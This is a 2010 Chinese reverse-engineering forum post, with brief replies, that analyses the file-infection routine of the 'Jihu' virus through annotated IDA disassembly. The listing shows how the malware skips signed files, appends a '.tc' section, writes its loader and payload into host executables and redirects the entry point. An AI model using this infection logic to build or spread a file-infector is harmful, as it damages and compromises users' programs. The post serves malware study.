极虎感染代码的详细分析

fzyr520 发表于 2010-7-7 13:13

【文章标题】: 极虎感染型病毒感染代码的详细分析
【文章作者】: fzyr520
【使用工具】: OD,IDA,PEID
【操作平台】: XP-SP2
【作者声明】: 其他部分有人分析过了，感染部分我补上，如有不对请指正。
解压密码：123
感染带我我标注的函数是Infect
EXPLORER.EXE（感染源）放出appmgmts.dll，感染功能在appmgmts.dll中

1.先判断时候有签名，如果是系统签名文件就不感染；
.text:00406B36 ; int __stdcall Infect(LPCSTR lpMultiByteStr)
.text:00406B36 Infect       proc near             ; CODE XREF: sub_405F38+FCp
.text:00406B36
.text:00406B36 var_13C       = dword ptr -13Ch
.text:00406B36 var_138       = dword ptr -138h
.text:00406B36 var_134       = byte ptr -134h
.text:00406B36 var_E8       = dword ptr -0E8h
.text:00406B36 Infect_Section_FileOffset= dword ptr -0E4h
.text:00406B36 var_E0       = dword ptr -0E0h
.text:00406B36 var_DC       = byte ptr -0DCh
.text:00406B36 PE          = dword ptr -90h
.text:00406B36 EntryPoint_source= dword ptr -8Ch
.text:00406B36 CreationTime = byte ptr -88h
.text:00406B36 var_70       = dword ptr -70h
.text:00406B36 Buffer       = dword ptr -6Ch
.text:00406B36 hFile       = dword ptr -68h
.text:00406B36 Dst          = dword ptr -64h
.text:00406B36 var_60       = dword ptr -60h
.text:00406B36 SizeOf_InfectSource= dword ptr -5Ch
.text:00406B36 InfectSection_VirtualAddress= dword ptr -58h
.text:00406B36 SizeOf_InfectSource_FileOffSet= dword ptr -54h
.text:00406B36 var_50       = dword ptr -50h
.text:00406B36 var_42       = word ptr -42h
.text:00406B36 var_40       = dword ptr -40h
.text:00406B36 var_3C       = dword ptr -3Ch
.text:00406B36 current_section = dword ptr -38h
.text:00406B36 NumberOfBytesWritten= dword ptr -34h
.text:00406B36 hObject       = dword ptr -30h
.text:00406B36 var_2C       = dword ptr -2Ch
.text:00406B36 lpBaseAddress = dword ptr -28h
.text:00406B36 var_24       = dword ptr -24h
.text:00406B36 var_20       = dword ptr -20h
.text:00406B36 raw_size    = dword ptr -1Ch
.text:00406B36 var_18       = dword ptr -18h
.text:00406B36 var_10       = dword ptr -10h
.text:00406B36 var_4       = dword ptr -4
.text:00406B36 lpMultiByteStr= dword ptr8
.text:00406B36 arg_20       = dword ptr28h
.text:00406B36 arg_34       = dword ptr3Ch
.text:00406B36
.text:00406B36             push ebp
.text:00406B37             mov ebp, esp
.text:00406B39             push 0FFFFFFFFh
.text:00406B3B             push offset unk_409F00
.text:00406B40             push offset loc_4089A0
.text:00406B45             mov eax, large fs:0
.text:00406B4B             push eax
.text:00406B4C             mov large fs:0, esp
.text:00406B53             push ecx
.text:00406B54             push ecx
.text:00406B55             sub esp, 124h
.text:00406B5B             push ebx
.text:00406B5C             push esi
.text:00406B5D             push edi
.text:00406B5E             mov , esp
.text:00406B61             and , 0
.text:00406B65             and , 0
.text:00406B69             and , 0
.text:00406B6D             and , 0
.text:00406B71             and , 0
.text:00406B75             and , 0
.text:00406B79             and , 0
.text:00406B7D             and , 0
.text:00406B81             and , 0
.text:00406B88             and , 0
.text:00406B8C             or    , 0FFFFFFFFh
.text:00406B90             and , 0
.text:00406B94             and , 0
.text:00406B9B             and , 0
.text:00406B9F             and , 0
.text:00406BA3             push ; lpMultiByteStr
.text:00406BA6             call JudgmentWinVerifyTrust
.text:00406BAB             cmp eax, 1       ;
.text:00406BAB                                     ; 签名判断,不感染系统签名文件
.text:00406BAB                                     ;
.text:00406BAE             jnz short loc_406BB5
.text:00406BB0             jmp loc_4071A4

2.文件映射
.text:00406BDE ; ---------------------------------------------------------------------------
.text:00406BDE
.text:00406BDE loc_406BDE:                         ; CODE XREF: Infect+A1j
.text:00406BDE             push 0             ; int
.text:00406BE0             lea eax,
.text:00406BE6             push eax          ; lpCreationTime
.text:00406BE7             push ; hFile
.text:00406BEA             call __GetFileTime
.text:00406BEF             push FILE_END    ; dwMoveMethod
.text:00406BF1             push 0             ; lpDistanceToMoveHigh
.text:00406BF3             push 0             ; lDistanceToMove
.text:00406BF5             push ; hFile
.text:00406BF8             call ds:SetFilePointer
.text:00406BFE             mov , eax
.text:00406C01             push 0             ; lpName
.text:00406C03             push 0             ; dwMaximumSizeLow
.text:00406C05             push 0             ; dwMaximumSizeHigh
.text:00406C07             push PAGE_READWRITE; flProtect
.text:00406C09             push 0             ; lpFileMappingAttributes
.text:00406C0B             push ; hFile
.text:00406C0E             call ds:CreateFileMappingA
.text:00406C14             mov , eax
.text:00406C17             cmp , 0 ;
.text:00406C17                                     ; 比较创建文件映射是否成功
.text:00406C17                                     ;
.text:00406C1B             jnz short loc_406C22
.text:00406C1D             jmp loc_4071A4
.text:00406C22 ; ---------------------------------------------------------------------------
.text:00406C22
.text:00406C22 loc_406C22:                         ; CODE XREF: Infect+E5j
.text:00406C22             push 400h          ; dwNumberOfBytesToMap
.text:00406C27             push 0             ; dwFileOffsetLow
.text:00406C29             push 0             ; dwFileOffsetHigh
.text:00406C2B             push FILE_MAP_ALL_ACCESS ; dwDesiredAccess
.text:00406C30             push ; hFileMappingObject
.text:00406C33             call ds:MapViewOfFile
.text:00406C39             mov , eax
.text:00406C3C             cmp , 0
.text:00406C40             jz    short loc_406C4F
.text:00406C42             mov eax,
.text:00406C45             movzx eax, word ptr
.text:00406C48             cmp eax, 5A4Dh    ;
.text:00406C48                                     ; 比较是否为MZ
.text:00406C48                                     ;
.text:00406C4D             jz    short loc_406C54
.text:00406C4F
.text:00406C4F loc_406C4F:                         ; CODE XREF: Infect+10Aj
.text:00406C4F             jmp loc_4071A4
.text:00406C54 ; ---------------------------------------------------------------------------
.text:00406C54
.text:00406C54 loc_406C54:                         ; CODE XREF: Infect+117j
.text:00406C54             mov eax,
.text:00406C57             mov ecx,
.text:00406C5A             add ecx,
.text:00406C5D             mov , ecx
.text:00406C63             mov eax,
.text:00406C66             add eax,
.text:00406C69             cmp , eax
.text:00406C6F             jnb short loc_406C8C
.text:00406C71             mov eax,
.text:00406C77             cmp eax,
.text:00406C7A             jbe short loc_406C8C
.text:00406C7C             mov eax,
.text:00406C82             movzx eax, word ptr
.text:00406C85             cmp eax, 4550h    ;
.text:00406C85                                     ; 比较是否是PE
.text:00406C8A             jz    short loc_406C91
.text:00406C8C
.text:00406C8C loc_406C8C:                         ; CODE XREF: Infect+139j
.text:00406C8C                                     ; Infect+144j
.text:00406C8C             jmp loc_4071A4
.text:00406C91 ; ---------------------------------------------------------------------------
.text:00406C91
.text:00406C91 loc_406C91:                         ; CODE XREF: Infect+154j
.text:00406C91             mov eax,
.text:00406C97             movzx eax, word ptr ; 节数目
.text:00406C9B             dec eax
.text:00406C9C             imul eax, 28h
.text:00406C9F             mov ecx, ;
.text:00406C9F                                     ; ebp-90 导出表
.text:00406C9F                                     ;
.text:00406CA5             lea eax,
.text:00406CAC             mov , eax ;
.text:00406CAC                                     ; 最后一个节的节名放入ebp+var_20
.text:00406CAC                                     ;
.text:00406CAF             mov eax,
.text:00406CB2             movzx eax, word ptr ; NumberOfLinenumbers
.text:00406CB6             movzx ecx, word_40BE64 ; 和 D9比
.text:00406CB6                                     ;
.text:00406CBD             cmp eax, ecx
.text:00406CBF             jl    short loc_406CC6
.text:00406CC1             jmp loc_4071A4
.text:00406CC6 ; ---------------------------------------------------------------------------
.text:00406CC6
.text:00406CC6 loc_406CC6:                         ; CODE XREF: Infect+189j
.text:00406CC6             mov eax,
.text:00406CC9             movzx eax, word ptr
.text:00406CCD             test eax, eax
.text:00406CCF             jz    loc_406D5C    ;
.text:00406CCF                                     ; 此处跳走
.text:00406CCF                                     ;

3.具体感染过程
.text:00406D5C                                     ; Infect+1AFj
.text:00406D5C             mov eax,
.text:00406D62             movzx eax, word ptr
.text:00406D66             imul eax, 28h
.text:00406D69             add eax, 0F8h    ; 到节表的最后一个节后面,后面紧接着判断是否为0，
.text:00406D69                                     ; 28H大小
.text:00406D6E             mov , eax
.text:00406D71             mov eax,
.text:00406D77             add eax,
.text:00406D7A             mov , eax ; ebp+var_70 最后一个节结束的内存内存地址
.text:00406D7D             cmp , 0 ;
.text:00406D7D                                     ; ebp+var_2C = 00000000 判断最后一个接后面的起始位置是否
.text:00406D7D                                     ; 是0
.text:00406D7D                                     ;
.text:00406D81             jnz short loc_406DB7
.text:00406D83             and , 0
.text:00406D87             jmp short loc_406D90 ;
.text:00406D87                                     ; 循环加4,直到大小为4*A 大小，就是一个节的大小28
.text:00406D87                                     ;
.text:00406D89 ; ---------------------------------------------------------------------------
.text:00406D89
.text:00406D89 loc_406D89:                         ; CODE XREF: Infect+274j
.text:00406D89             mov eax,
.text:00406D8C             inc eax
.text:00406D8D             mov , eax
.text:00406D90
.text:00406D90 loc_406D90:                         ; CODE XREF: Infect+251j
.text:00406D90             cmp , 0Ah ;
.text:00406D90                                     ; 循环加4,直到大小为4*A 大小，就是一个节的大小28
.text:00406D90                                     ;
.text:00406D94             jge short loc_406DAC
.text:00406D96             mov eax,
.text:00406D99             mov ecx,
.text:00406D9C             add ecx,
.text:00406D9E             mov , ecx
.text:00406DA1             mov eax,
.text:00406DA4             add eax, 4
.text:00406DA7             mov , eax
.text:00406DAA             jmp short loc_406D89
.text:00406DAC ; ---------------------------------------------------------------------------
.text:00406DAC
.text:00406DAC loc_406DAC:                         ; CODE XREF: Infect+25Ej
.text:00406DAC             cmp , 0
.text:00406DB0             jz    short loc_406DB7
.text:00406DB2             jmp loc_4071A4
.text:00406DB7 ; ---------------------------------------------------------------------------
.text:00406DB7
.text:00406DB7 loc_406DB7:                         ; CODE XREF: Infect+24Bj
.text:00406DB7                                     ; Infect+27Aj
.text:00406DB7             mov eax,
.text:00406DBD             mov eax,
.text:00406DC0             mov , eax ;
.text:00406DC0                                     ; 存放原始入口点
.text:00406DC0                                     ;
.text:00406DC6             mov eax,
.text:00406DCC             movzx eax, word ptr
.text:00406DD0             dec eax
.text:00406DD1             imul eax, 28h
.text:00406DD4             mov ecx,
.text:00406DDA             lea eax,
.text:00406DE1             mov , eax
.text:00406DE4             push 28h          ; Size
.text:00406DE6             push 0             ; Val
.text:00406DE8             lea eax,
.text:00406DEB             push eax          ; Dst
.text:00406DEC             call memset
.text:00406DF1             add esp, 0Ch
.text:00406DF4             mov , 'ct.' ; 节名
.text:00406DFB             mov eax,
.text:00406E01             mov , eax
.text:00406E04             mov eax,
.text:00406E0A             push ; 节对齐大小
.text:00406E0D             mov eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E12             add eax, 1FBh
.text:00406E17             push eax
.text:00406E18             call CalculateSection ;
.text:00406E18                                     ; 按节对齐的方式计算添加的感染节.tc 的virtual size
.text:00406E18                                     ;fun(infect_source_size+infect_section_size,SectionAlignment)
.text:00406E18                                     ;
.text:00406E1D             mov , eax ; 3e000
.text:00406E20             mov eax,
.text:00406E26             push
.text:00406E29             mov eax,
.text:00406E2C             push
.text:00406E2F             call CalculateSection ;
.text:00406E2F                                     ; 按节对齐的方式计算正常文件最后一个节的virtual_size
.text:00406E2F                                     ;
.text:00406E34             mov ecx, ;
.text:00406E34                                     ;
.text:00406E37             add eax, ;
.text:00406E37                                     ;计算得到感染节的VirtualAddress
.text:00406E37                                     ;
.text:00406E3A             mov , eax
.text:00406E3D             mov eax,
.text:00406E43             push ; 文件对齐大小
.text:00406E46             mov eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E4B             add eax, 1FBh
.text:00406E50             push eax
.text:00406E51             call CalculateSection ;
.text:00406E51                                     ; 按文件对齐的方式计算添加的感染节.tc 的
.text:00406E51                                     ; raw size大小
.text:00406E51                                     ;fun(infect_source_size+infect_section_size,FileAlignment)
.text:00406E56             mov , eax
.text:00406E59             and , 0
.text:00406E60             push 4Ch          ; Size
.text:00406E62             push 0             ; Val
.text:00406E64             lea eax,
.text:00406E6A             push eax          ; Dst
.text:00406E6B             call memset
.text:00406E70             add esp, 0Ch
.text:00406E73             and , 0
.text:00406E7A             push 4Ch          ; Size
.text:00406E7C             push 0             ; Val
.text:00406E7E             lea eax,
.text:00406E84             push eax          ; Dst
.text:00406E85             call memset
.text:00406E8A             add esp, 0Ch
.text:00406E8D             and , 0
.text:00406E91             mov , 1
.text:00406E98             jmp short loc_406EA1
.text:00406E9A ; ---------------------------------------------------------------------------
.text:00406E9A
.text:00406E9A loc_406E9A:                         ; CODE XREF: Infect:loc_406F0Cj
.text:00406E9A             mov eax,
.text:00406E9D             inc eax          ;
.text:00406E9D                                     ; 节数加1
.text:00406E9D                                     ;
.text:00406E9E             mov , eax
.text:00406EA1
.text:00406EA1 loc_406EA1:                         ; CODE XREF: Infect+362j
.text:00406EA1             mov eax,
.text:00406EA7             movzx eax,
.text:00406EAB             cmp , eax ;
.text:00406EAB                                     ; 比较节从第一个节开始
.text:00406EAB                                     ;
.text:00406EAE             jg    short loc_406F0E
.text:00406EB0             mov eax,
.text:00406EB6             movzx eax,
.text:00406EBA             sub eax,
.text:00406EBD             imul eax, 28h
.text:00406EC0             mov ecx,
.text:00406EC6             lea eax,
.text:00406ECD             mov , eax
.text:00406ED0             mov eax,
.text:00406ED3             cmp , 0 ; 比较节大小是否为0
.text:00406ED7             jz    short loc_406F0C
.text:00406ED9             mov eax,
.text:00406EDC             mov eax, ; 节文件偏移
.text:00406EDF             mov ecx,
.text:00406EE2             add eax, ;
.text:00406EE2                                     ; 节偏移+节大小 = 计算添加感染节的raw offset
.text:00406EE2                                     ; 由于在循环体中，这里计算是每个节的节偏移加节大小
.text:00406EE5             mov , eax
.text:00406EE8             mov eax, ; 上面计算了节偏移+节大小
.text:00406EE8                                     ; 这里 ebp+var_24 是下一个节的raw offset
.text:00406EE8                                     ;
.text:00406EEB             sub eax, ; 计算 current_section raw size
.text:00406EEE             mov ecx, ; ebp+var_2C 从0开始
.text:00406EF1             mov , eax ; 把算出来的值存入var_138
.text:00406EF8             mov eax,
.text:00406EFB             mov ecx,
.text:00406EFE             mov , ecx
.text:00406F05             mov eax,
.text:00406F08             inc eax          ;
.text:00406F08                                     ; 从第一个节开始循环加一
.text:00406F08                                     ;
.text:00406F09             mov , eax
.text:00406F0C
.text:00406F0C loc_406F0C:                         ; CODE XREF: Infect+3A1j
.text:00406F0C             jmp short loc_406E9A
.text:00406F0E ; ---------------------------------------------------------------------------
.text:00406F0E
.text:00406F0E loc_406F0E:                         ; CODE XREF: Infect+378j
.text:00406F0E             and , 0
.text:00406F15             mov eax,
.text:00406F1B             mov , eax
.text:00406F1E             and , 0
.text:00406F22             jmp short loc_406F2B
.text:00406F24 ; ---------------------------------------------------------------------------
.text:00406F24
.text:00406F24 loc_406F24:                         ; CODE XREF: Infect:loc_406F4Fj
.text:00406F24             mov eax,
.text:00406F27             inc eax          ; 节循环加1
.text:00406F28             mov , eax
.text:00406F2B
.text:00406F2B loc_406F2B:                         ; CODE XREF: Infect+3ECj
.text:00406F2B             mov eax,
.text:00406F2E             cmp eax,
.text:00406F31             jge short loc_406F51
.text:00406F33             mov eax,
.text:00406F36             mov ecx,
.text:00406F39             cmp ecx, ; 比较每个节的raw_size是否为0
.text:00406F40             jbe short loc_406F4F
.text:00406F42             mov eax,
.text:00406F45             mov eax,
.text:00406F4C             mov , eax
.text:00406F4F
.text:00406F4F loc_406F4F:                         ; CODE XREF: Infect+40Aj
.text:00406F4F             jmp short loc_406F24
.text:00406F51 ; ---------------------------------------------------------------------------
.text:00406F51
.text:00406F51 loc_406F51:                         ; CODE XREF: Infect+3FBj
.text:00406F51             and , 0
.text:00406F55             jmp short loc_406F5E
.text:00406F57 ; ---------------------------------------------------------------------------
.text:00406F57
.text:00406F57 loc_406F57:                         ; CODE XREF: Infect:loc_406F87j
.text:00406F57             mov eax,
.text:00406F5A             inc eax
.text:00406F5B             mov , eax
.text:00406F5E
.text:00406F5E loc_406F5E:                         ; CODE XREF: Infect+41Fj
.text:00406F5E             mov eax,
.text:00406F61             cmp eax,
.text:00406F64             jge short loc_406F89
.text:00406F66             mov eax,
.text:00406F69             mov ecx,
.text:00406F6C             cmp ecx,
.text:00406F73             jnz short loc_406F87
.text:00406F75             mov eax,
.text:00406F78             mov eax,
.text:00406F7F             mov , eax
.text:00406F85             jmp short loc_406F89
.text:00406F87 ; ---------------------------------------------------------------------------
.text:00406F87
.text:00406F87 loc_406F87:                         ; CODE XREF: Infect+43Dj
.text:00406F87             jmp short loc_406F57
.text:00406F89 ; ---------------------------------------------------------------------------
.text:00406F89
.text:00406F89 loc_406F89:                         ; CODE XREF: Infect+42Ej
.text:00406F89                                     ; Infect+44Fj
.text:00406F89             cmp , 0
.text:00406F90             jnz short loc_406F9C
.text:00406F92             mov , 1
.text:00406F9C
.text:00406F9C loc_406F9C:                         ; CODE XREF: Infect+45Aj
.text:00406F9C             mov eax,
.text:00406FA2             movzx eax,
.text:00406FA6             sub eax,
.text:00406FAC             imul eax, 28h
.text:00406FAF             mov ecx,
.text:00406FB5             lea eax,
.text:00406FBC             mov , eax
.text:00406FBF             mov eax,
.text:00406FC5             push
.text:00406FC8             mov eax,
.text:00406FCB             push
.text:00406FCE             call CalculateSection ; 按文件对齐的方式计算正常文件最后一个节的大小
.text:00406FD3             mov , eax
.text:00406FD6             mov eax,
.text:00406FD9             mov ecx,
.text:00406FDC             add ecx, ; 计算感染节的raw_offset
.text:00406FDF             mov , ecx
.text:00406FE5             mov eax,
.text:00406FE8             sub eax,
.text:00406FEE             mov , eax
.text:00406FF4             cmp , 0 ;
.text:00406FF4                                     ; 比较节大小是否为0
.text:00406FF4                                     ;
.text:00406FF8             jz    short loc_40700A
.text:00406FFA             xor eax, eax
.text:00406FFC             sub eax,
.text:00407002             mov , eax
.text:00407008             jmp short loc_407019
.text:0040700A ; ---------------------------------------------------------------------------
.text:0040700A
.text:0040700A loc_40700A:                         ; CODE XREF: Infect+4C2j
.text:0040700A             mov eax,
.text:00407010             sub eax,
.text:00407013             mov , eax
.text:00407019
.text:00407019 loc_407019:                         ; CODE XREF: Infect+4D2j
.text:00407019             mov eax,
.text:0040701F             mov , eax
.text:00407022             mov , 0E0000020h
.text:00407029             mov ax, word_40BE64 ; word_40BE64 = d9
.text:0040702F             mov , ax
.text:00407033             push 28h          ; Size
.text:00407035             lea eax,
.text:00407038             push eax          ; Src
.text:00407039             mov eax,
.text:0040703F             add eax,
.text:00407042             push eax          ; Dst
.text:00407043             call memcpy
.text:00407048             add esp, 0Ch
.text:0040704B             mov eax,
.text:00407051             movzx eax,
.text:00407055             inc eax          ;
.text:00407055                                     ; 节数加1
.text:00407055                                     ;
.text:00407056             mov ecx,
.text:0040705C             mov , ax ;
.text:0040705C                                     ; 修改PE节的数目为感染后节数目
.text:0040705C                                     ;
.text:00407060             mov eax,
.text:00407066             cmp , 0 ; 比较sizeofcode是否为0
.text:0040706A             jz    short loc_407081
.text:0040706C             mov eax,
.text:00407072             mov eax,
.text:00407075             add eax, ; 计算感染后的SizeOfCode
.text:00407078             mov ecx,
.text:0040707E             mov , eax ; 用感染后的sizeofcode替换掉原始值
.text:0040707E                                     ;
.text:00407081
.text:00407081 loc_407081:                         ; CODE XREF: Infect+534j
.text:00407081             mov eax,
.text:00407087             mov ecx, ; InfectSection_VirtualAddress其实就是感染后的入口点
.text:0040708A             mov , ecx
.text:0040708D             mov eax,
.text:00407093             mov eax,
.text:00407096             add eax, ; 计算得到感染后的SizeOfImage
.text:00407099             mov ecx,
.text:0040709F             mov , eax ; 用感染后的sizeofimage替换掉原始值
.text:004070A2             push ; lpBaseAddress
.text:004070A5             call ds:UnmapViewOfFile
.text:004070AB             push ; hObject
.text:004070AE             call ds:CloseHandle
.text:004070B4             and , 0
.text:004070B8             and , 0
.text:004070BC             push FILE_END    ; dwMoveMethod
.text:004070BE             push 0             ; lpDistanceToMoveHigh
.text:004070C0             mov eax,
.text:004070C6             add eax,
.text:004070C9             push eax          ; lDistanceToMove
.text:004070CA             push ; hFile
.text:004070CD             call ds:SetFilePointer
.text:004070D3             push ; hFile
.text:004070D6             call ds:SetEndOfFile ;
.text:004070D6                                     ; 把文件指针移到文件尾增加节的长度3E000
.text:004070D6                                     ;
.text:004070DC             push FILE_END    ; dwMoveMethod
.text:004070DE             push 0             ; lpDistanceToMoveHigh
.text:004070E0             xor eax, eax
.text:004070E2             sub eax,
.text:004070E5             push eax          ; lDistanceToMove
.text:004070E6             push ; hFile
.text:004070E9             call ds:SetFilePointer ;
.text:004070E9                                     ; 把指针移到原始文件尾
.text:004070E9                                     ;
.text:004070EF             push 0             ; lpOverlapped
.text:004070F1             lea eax,
.text:004070F4             push eax          ; lpNumberOfBytesWritten
.text:004070F5             push 1FBh          ; nNumberOfBytesToWrite
.text:004070FA             push offset loc_409B78 ;
.text:004070FA                                     ; loc_409B78 为感染节的代码大小为1FB
.text:004070FA                                     ;
.text:004070FF             push ; hFile
.text:00407102             call ds:WriteFile ;
.text:00407102                                     ; 向增加的节写入感染代码
.text:00407102                                     ;
.text:00407108             push 0             ; lpOverlapped
.text:0040710A             lea eax,
.text:0040710D             push eax          ; lpNumberOfBytesWritten
.text:0040710E             push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407114             push lpBuffer    ; lpBuffer
.text:0040711A             push ; hFile
.text:0040711D             call ds:WriteFile ;
.text:0040711D                                     ; 从1FB处写整个感染源
.text:0040711D                                     ;
.text:00407123             push FILE_CURRENT ; dwMoveMethod
.text:00407125             push 0             ; lpDistanceToMoveHigh
.text:00407127             xor eax, eax
.text:00407129             sub eax, nNumberOfBytesToWrite
.text:0040712F             push eax          ; lDistanceToMove
.text:00407130             push ; hFile
.text:00407133             call ds:SetFilePointer ;
.text:00407133                                     ; 移到感染代码1FB处
.text:00407133                                     ;
.text:00407139             push 0             ; lpOverlapped
.text:0040713B             lea eax,
.text:0040713E             push eax          ; lpNumberOfBytesWritten
.text:0040713F             push 4             ; nNumberOfBytesToWrite
.text:00407141             push offset nNumberOfBytesToWrite ; lpBuffer
.text:00407146             push ; hFile
.text:00407149             call ds:WriteFile ;
.text:00407149                                     ; 写入感染源大小3e600,这里会导致前面刚写入的感染源
.text:00407149                                     ; （exe文件）的头4个byte被这个大小覆盖掉
.text:00407149                                     ;
.text:0040714F             mov eax,
.text:00407152             add eax, 193h
.text:00407157             mov ecx,
.text:0040715D             sub ecx, eax    ;
.text:0040715D                                     ; 计算跳回正常程序的入口点地址，感染代码这个值没有，
.text:0040715D                                     ; 是在这里计算后写入的
.text:0040715D                                     ;
.text:0040715D                                     ;
.text:0040715F             mov , ecx
.text:00407162             push FILE_CURRENT ; dwMoveMethod
.text:00407164             push 0             ; lpDistanceToMoveHigh
.text:00407166             push 0FFFFFF90h    ; lDistanceToMove
.text:00407168             push ; hFile
.text:0040716B             call ds:SetFilePointer
.text:00407171             push 0             ; lpOverlapped
.text:00407173             lea eax,
.text:00407176             push eax          ; lpNumberOfBytesWritten
.text:00407177             push 4             ; nNumberOfBytesToWrite
.text:00407179             lea eax,
.text:0040717C             push eax          ; lpBuffer
.text:0040717D             push ; hFile
.text:00407180             call ds:WriteFile ;
.text:00407180                                     ; 写入原始程序入口点地址，也就是jmp跳回正常程序
.text:00407180                                     ;
.text:00407186             push 1             ; int
.text:00407188             lea eax,
.text:0040718E             push eax          ; lpCreationTime
.text:0040718F             push ; hFile
.text:00407192             call __GetFileTime
.text:00407197             push ; hObject
.text:0040719A             call ds:CloseHandle
.text:004071A0             or    , 0FFFFFFFFh
.text:004071A4
.text:004071A4 loc_4071A4:                         ; CODE XREF: Infect+7Aj
.text:004071A4                                     ; Infect+A3j ...
.text:004071A4             cmp , 0
.text:004071A8             jz    short loc_4071B3
.text:004071AA             push ; lpBaseAddress
.text:004071AD             call ds:UnmapViewOfFile
.text:004071B3
.text:004071B3 loc_4071B3:                         ; CODE XREF: Infect+672j
.text:004071B3             cmp , 0
.text:004071B7             jz    short loc_4071C2
.text:004071B9             push ; hObject
.text:004071BC             call ds:CloseHandle
.text:004071C2
.text:004071C2 loc_4071C2:                         ; CODE XREF: Infect+681j
.text:004071C2             cmp , 0FFFFFFFFh
.text:004071C6             jz    short loc_4071D1
.text:004071C8             push ; hObject
.text:004071CB             call ds:CloseHandle
.text:004071D1
.text:004071D1 loc_4071D1:                         ; CODE XREF: Infect+690j
.text:004071D1             or    , 0FFFFFFFFh
.text:004071D5             jmp short loc_40720F
.text:004071D7 ; ---------------------------------------------------------------------------
.text:004071D7
.text:004071D7 loc_4071D7:                         ; DATA XREF: .rdata:00409F04o
.text:004071D7             xor eax, eax
.text:004071D9             inc eax
.text:004071DA             retn
.text:004071DB ; ---------------------------------------------------------------------------
.text:004071DB
.text:004071DB loc_4071DB:                         ; DATA XREF: .rdata:00409F08o
.text:004071DB             mov esp,
.text:004071DE             cmp , 0
.text:004071E2             jz    short loc_4071ED
.text:004071E4             push ; lpBaseAddress
.text:004071E7             call ds:UnmapViewOfFile
.text:004071ED
.text:004071ED loc_4071ED:                         ; CODE XREF: Infect+6ACj
.text:004071ED             cmp , 0
.text:004071F1             jz    short loc_4071FC
.text:004071F3             push ; hObject
.text:004071F6             call ds:CloseHandle
.text:004071FC
.text:004071FC loc_4071FC:                         ; CODE XREF: Infect+6BBj
.text:004071FC             cmp , 0FFFFFFFFh
.text:00407200             jz    short loc_40720B
.text:00407202             push ; hObject
.text:00407205             call ds:CloseHandle
.text:0040720B
.text:0040720B loc_40720B:                         ; CODE XREF: Infect+6CAj
.text:0040720B             or    , 0FFFFFFFFh
.text:0040720F
.text:0040720F loc_40720F:                         ; CODE XREF: Infect+69Fj
.text:0040720F             mov ecx,
.text:00407212             mov large fs:0, ecx
.text:00407219             pop edi
.text:0040721A             pop esi
.text:0040721B             pop ebx
.text:0040721C             leave
.text:0040721D             retn 4
.text:0040721D Infect       endp

332041450 发表于 2010-7-7 13:19

抢沙发......

我是猪 发表于 2010-7-7 13:33

看看学习来了

zhanghao1900 发表于 2010-7-28 22:17

dddddddddddddddddddddddddddddddddddddddddddd

Hmily 发表于 2010-8-10 03:01

刚看到文章,加精鼓励,IDA的注视流程很清楚啊.

貌似纯洁 发表于 2010-8-10 13:06

学习下

sgkr 发表于 2010-8-10 19:52

研究下！！！

douforster 发表于 2010-8-11 12:08

怎么比铁军给我的少了点。

iso9001 发表于 2010-8-11 21:24

分析得非常好

fulongzai 发表于 2010-9-16 23:12

确实很不错学习啦

页: [1] 2 3 4

吾爱破解 - 52pojie.cn's Archiver

极虎感染代码的详细分析